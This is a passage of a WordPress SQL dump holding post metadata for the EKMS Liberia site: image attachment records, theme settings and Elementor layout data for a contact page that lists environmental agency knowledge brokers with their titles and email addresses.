2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629062954;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3749;}i:2;a:1:{s:2:\"id\";i:3738;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103665;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3749;}i:2;a:1:{s:2:\"id\";i:3738;}i:3;a:1:{s:2:\"id\";i:3710;}i:4;a:1:{s:2:\"id\";i:3297;}i:5;a:1:{s:2:\"id\";i:3117;}}}}'),(23758,3482,'_edit_lock','1612791798:42'),(23759,3482,'_last_editor_used_jetpack','block-editor'),(23760,3483,'_wp_attached_file','2021/02/BlueOceans.jpg'),(23761,3483,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2021/02/BlueOceans.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"BlueOceans-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"BlueOceans-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"BlueOceans-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23764,3482,'_thumbnail_id','3483'),(23765,3482,'_edit_last','42'),(23766,3482,'ocean_gallery_link_images','off'),(23767,3482,'ocean_sidebar','0'),(23768,3482,'ocean_second_sidebar','0'),(23769,3482,'ocean_disable_margins','enable'),(23770,3482,'ocean_display_top_bar','default'),(23771,3482,'ocean_display_header','default'),(23772,3482,'ocean_center_header_left_menu','0'),(23773,3482,'ocean_custom_header_template','0'),(23774,3482,'ocean_header_custom_menu','0'),(23775,3482,'ocean_menu_typo_font_family','0'),(23776,3482,'ocean_disable_title','default'),(23777,3482,'ocean_disable_heading','default'),(23778,3482,'ocean_disable_breadcrumbs','default'),(23779,3482,'ocean_display_footer_widgets','default'),(23780,3482,'ocean_display_footer_bottom','default'),(23781,3482,'ocean_custom_footer_template','0'),(23782,3482,'ocean_link_format_target','self'),(23783,3482,'ocean_quote_format_link','post'),(23784,3482,'osh_disable_topbar_sticky','default'),(23785,3482,'osh_disable_header_sticky','default'),(23786,3482,'osh_sticky_header_style','default'),(23789,3486,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103665;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3045;}i:1;a:1:{s:2:\"id\";i:3023;}i:2;a:1:{s:2:\"id\";i:3038;}i:3;a:1:{s:2:\"id\";i:3066;}i:4;a:1:{s:2:\"id\";i:3430;}i:5;a:1:{s:2:\"id\";i:2801;}}}}'),(23790,3486,'_edit_lock','1612792125:42'),(23791,3486,'_last_editor_used_jetpack','block-editor'),(23792,3487,'_wp_attached_file','2021/02/epa.png'),(23793,3487,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/02/epa.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23796,3486,'_thumbnail_id','3487'),(23797,3486,'_edit_last','42'),(23798,3486,'ocean_gallery_link_images','off'),(23799,3486,'ocean_sidebar','0'),(23800,3486,'ocean_second_sidebar','0'),(23801,3486,'ocean_disable_margins','enable'),(23802,3486,'ocean_display_top_bar','default'),(23803,3486,'ocean_display_header','default'),(23804,3486,'ocean_center_header_left_menu','0'),(23805,3486,'ocean_custom_header_template','0'),(23806,3486,'ocean_header_custom_menu','0'),(23807,3486,'ocean_menu_typo_font_family','0'),(23808,3486,'ocean_disable_title','default'),(23809,3486,'ocean_disable_heading','default'),(23810,3486,'ocean_disable_breadcrumbs','default'),(23811,3486,'ocean_display_footer_widgets','default'),(23812,3486,'ocean_display_footer_bottom','default'),(23813,3486,'ocean_custom_footer_template','0'),(23814,3486,'ocean_link_format_target','self'),(23815,3486,'ocean_quote_format_link','post'),(23816,3486,'osh_disable_topbar_sticky','default'),(23817,3486,'osh_disable_header_sticky','default'),(23818,3486,'osh_sticky_header_style','default'),(23819,3489,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627651713;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3290;}i:2;a:1:{s:2:\"id\";i:3063;}}}}'),(23820,3489,'_edit_lock','1612957489:42'),(23821,3489,'_last_editor_used_jetpack','block-editor'),(23822,3490,'_wp_attached_file','2021/02/building.png'),(23823,3490,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2021/02/building.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"building-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"building-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"building-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23826,3489,'_thumbnail_id','3490'),(23827,3489,'_edit_last','42'),(23828,3489,'ocean_gallery_link_images','off'),(23829,3489,'ocean_sidebar','0'),(23830,3489,'ocean_second_sidebar','0'),(23831,3489,'ocean_disable_margins','enable'),(23832,3489,'ocean_display_top_bar','default'),(23833,3489,'ocean_display_header','default'),(23834,3489,'ocean_center_header_left_menu','0'),(23835,3489,'ocean_custom_header_template','0'),(23836,3489,'ocean_header_custom_menu','0'),(23837,3489,'ocean_menu_typo_font_family','0'),(23838,3489,'ocean_disable_title','default'),(23839,3489,'ocean_disable_heading','default'),(23840,3489,'ocean_disable_breadcrumbs','default'),(23841,3489,'ocean_display_footer_widgets','default'),(23842,3489,'ocean_display_footer_bottom','default'),(23843,3489,'ocean_custom_footer_template','0'),(23844,3489,'ocean_link_format_target','self'),(23845,3489,'ocean_quote_format_link','post'),(23846,3489,'osh_disable_topbar_sticky','default'),(23847,3489,'osh_disable_header_sticky','default'),(23848,3489,'osh_sticky_header_style','default'),(23849,89,'_last_editor_used_jetpack','block-editor'),(23850,1612,'_last_editor_used_jetpack','classic-editor'),(23851,9,'_last_editor_used_jetpack','block-editor'),(23886,1737,'_last_editor_used_jetpack','classic-editor'),(23889,3498,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628599624;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3313;}i:1;a:1:{s:2:\"id\";i:3710;}i:2;a:1:{s:2:\"id\";i:3735;}}}}'),(23890,3498,'_edit_lock','1613642784:42'),(23891,3498,'_last_editor_used_jetpack','block-editor'),(23892,3499,'_wp_attached_file','2021/02/MOA.png'),(23893,3499,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/02/MOA.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MOA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MOA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"MOA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23896,3498,'_thumbnail_id','3499'),(23897,3498,'_edit_last','42'),(23900,3498,'ocean_gallery_link_images','off'),(23901,3498,'ocean_sidebar','0'),(23902,3498,'ocean_second_sidebar','0'),(23903,3498,'ocean_disable_margins','enable'),(23904,3498,'ocean_display_top_bar','default'),(23905,3498,'ocean_display_header','default'),(23906,3498,'ocean_center_header_left_menu','0'),(23907,3498,'ocean_custom_header_template','0'),(23908,3498,'ocean_header_custom_menu','0'),(23909,3498,'ocean_menu_typo_font_family','0'),(23910,3498,'ocean_disable_title','default'),(23911,3498,'ocean_disable_heading','default'),(23912,3498,'ocean_disable_breadcrumbs','default'),(23913,3498,'ocean_display_footer_widgets','default'),(23914,3498,'ocean_display_footer_bottom','default'),(23915,3498,'ocean_custom_footer_template','0'),(23916,3498,'ocean_link_format_target','self'),(23917,3498,'ocean_quote_format_link','post'),(23918,3498,'osh_disable_topbar_sticky','default'),(23919,3498,'osh_disable_header_sticky','default'),(23920,3498,'osh_sticky_header_style','default'),(23921,80,'_last_editor_used_jetpack','block-editor'),(23929,3503,'_elementor_edit_mode','builder'),(23930,3503,'_elementor_template_type','wp-page'),(23931,3503,'_elementor_version','3.0.16'),(23932,3503,'_wp_page_template','default'),(23933,3503,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA 